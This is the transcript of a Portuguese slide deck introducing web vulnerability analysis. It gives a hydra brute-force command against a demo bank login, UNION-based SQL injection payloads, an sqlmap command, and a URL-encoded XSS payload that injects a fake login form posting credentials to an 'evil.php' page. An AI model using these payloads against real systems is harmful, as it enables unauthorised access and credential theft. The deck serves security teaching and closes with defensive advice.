introdução a analise de vulnerabilidades web

Download Introdução a analise de vulnerabilidades Web

If you can't read please download the document

Upload: twisting-the-truth

Post on 12-Apr-2017

273 views

Category:

Internet


1 download

TRANSCRIPT

1 Hack The Potat0

Introduo a Anlise de Vulnerabilidades Web

Organizao: Oeste Hacker Club OHChttp://oestehc.com.br/

Bruno dropped Criado{bruno|dropped}[at]tttruth.comhttp://tttruth.com

Sobre mim

Freelancer (Sec/Dev)

Entusiasta em Sec a mais de 15 anos

Profissional TI a mais de 10 anos (Infraestrutura/Redes/Desenvolvimento)

Membro fundador do OHC

Protocol HTTP/1.1 RFC 2616

curl -v http://www.pudim.com.br

nc www.pudim.com.br 80 GET / HTTP/1.1

nc oestehc.com.br 80GET / HTTP/1.1

Methods HTTP/1.1

GET

HEAD

POST

PUT

PATCH

OPTIONS

DELETE

TRACE

CONNECT

Status Code HTTP/1.1

1xx Information

2xx Successful

3xx Redirection

4xx Client Error

5xx Server Error

OWASP Top 10 2013

Erros mais comuns

Falta de Canonicalizao

Apenas verificaes Client-Side

Obscuridade

Tools

OWASP ZAP / Burp Suite

wfuzz / dirb / dirbuster

w3af / arachni / Vega

sqlmap

(x)hydra / brutus

HTTP Proxy

Quebra de Autenticao - (x)hydra

hydra -p naosei -L /usr/share/wordlists/wfuzz/general/common.txt www.testfire.net http-post-form /bank/login.aspx:uid=^USER^&passw=^PASS^&btnSubmit=Login:Please try again

SQL Injection

SQL Injection

Encontrar n de colunas

Qual coluna printa informaes

Obter informaes da tabela

SQL Injection

Encontrar n de colunas

id=1 UNION SELECT 1, 2, 3, , Xid=1 ORDER BY 5, 10, 15Qual coluna printa informaes

Obter informaes da tabela

SQL Injection

Encontrar n de colunas

Qual coluna printa informaes

id=1 UNION SELECT 1, 2, 3, 4, 5, @@version, 7 id=1 UNION SELECT 1, 2, 3, 4, 5, @@hostname, 7id=1 UNION SELECT 1, 2, 3, 4, 5, current_user(), 7id=1 UNION SELECT 1, 2, 3, 4, 5, database(), 7id=1 UNION SELECT 1, 2, 3, 4, 5, uuid(), 7Obter informaes da tabela

Obter informaes de outras tabelas/database

SQL Injection

Encontrar n de colunas

Qual coluna printa informaes

Obter informaes da tabela

id=1 UNION SELECT 1, 2, 3, c_name, 4, 5, from information_schema.columnsid=1 UNION SELECT 1, 2, 3, t_name, 4, 5, from information_schema.tables

SQL Injection - sqlmap

sqlmap -u http://www.site.com/page.php?id=2

Cross-Site Scripting (XSS)

Dear user please provide password Username:

Password:

%3Ch1%3EDear+user+please+provide+password+%3Ch1%3E%3Cdiv+background-color%3A%23FF3300%3E%3Cform+action%3D%E2%80%9Dhttp%3A%2F%2F127.0.0.1%2Fevil.php%E2%80%9D%3EUsername%3A%3Cbr%3E%3Cinput+type%3D%E2%80%9Dtext%E2%80%9D+name%3D%E2%80%9Duser%E2%80%9D%3E%3Cbr%3EPassword%3A%3Cbr%3E%3Cinput+type%3D%E2%80%9Dtext%E2%80%9D+name%3D%E2%80%9Dpass%E2%80%9D%3E%3Cbr%3E%3Cinput+type%3DSUBMIT+value%3D%22login%22+%2F%3E%3C%2Fform%3E%3C%2Fdiv%3E

Pense nisso!

Desconfie de dados externos

possvel forjar os dados

Sempre valide

Previna e trate os erros

Revise

Teste a segurana